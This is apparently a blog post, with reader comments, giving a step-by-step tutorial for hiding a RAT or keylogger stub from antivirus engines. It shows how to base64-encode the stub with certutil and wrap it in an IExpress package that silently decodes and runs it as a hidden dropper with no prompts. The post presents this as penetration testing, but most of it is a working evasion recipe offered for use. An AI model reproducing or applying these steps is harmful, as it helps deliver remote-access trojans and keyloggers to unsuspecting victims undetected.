Crypting EXE Tutorial : Hide RAT/Keylogger for Penetration Testing
It is possible to hide your RAT/keylogger stub without a crypter! As penetration testers we need sometimes to hide the PE payload from the Anti Virus (AV) Engines . For this we end up either using the paid Crypters that basically Encrypt the payloads or finding a technique that can make the malicious executable Fully Undetected .
This means evading the Anti Virus is either Time Consuming or we end up spending money. And the worst part is that this Fully Undetected EXE will only evade AV only for sometime as sooner or latter the engine will be updated .
The following technique will try and evade the AV engines to an extent . But there is no grantee for FUD until you are using your own server .
This is just to encrypt the EXE , so possibly the Scan Time FUD for a known binary .
Crypting EXE Tutorial
Step 1 : First, we need to fire up CMD (command Prompt) in your system.
To do that press WIN + R to start Run
Type CMD.
Hit Enter
Step 2 : Now use CD to go to the directory your stub (Binary/EXE) is placed. This is the file you want to encrypt .
Step 3 : Now Type
CERTUTIL -ENCODE name_of_stub.exe name.txt
Step 4 : In the same CMD type iexpress
This will open a GUI window dialog Box .
Step 5 : Follow the Steps in the Iexpress Dialog Box
Click on Next
--> Select "Extract and run an installation command"
--> Type a package name
--> Select "No prompt"
--> Select "no license"
--> Add the name.txt file and certutil.exe found in C:/windows/system32
--> In the "Installation command" type CERTUTIL - DECODE NAME.TXT STUB.EXE and in the "Post installation command" type start stub.exe
--> Select "Hidden"
--> Select "No message"
--> Type name of your dropper.
This is it . Now the EXE is encrypted by the Free windows utility . What exactly happened here is that the code of the EXE has been encrypted i.e made complex and therefore difficult for the AV engine to read . The other use i can think for this tutorial is to make the code of your legit program scrambled so that it is difficult to be read or reverse engineered .
aghilesh says
poda naya wht the hell is this
Luis Dieguez says
Step 4 : It is iexpress no i express.
Nice work!
Lokesh Singh says
Thanks for correction. Updated!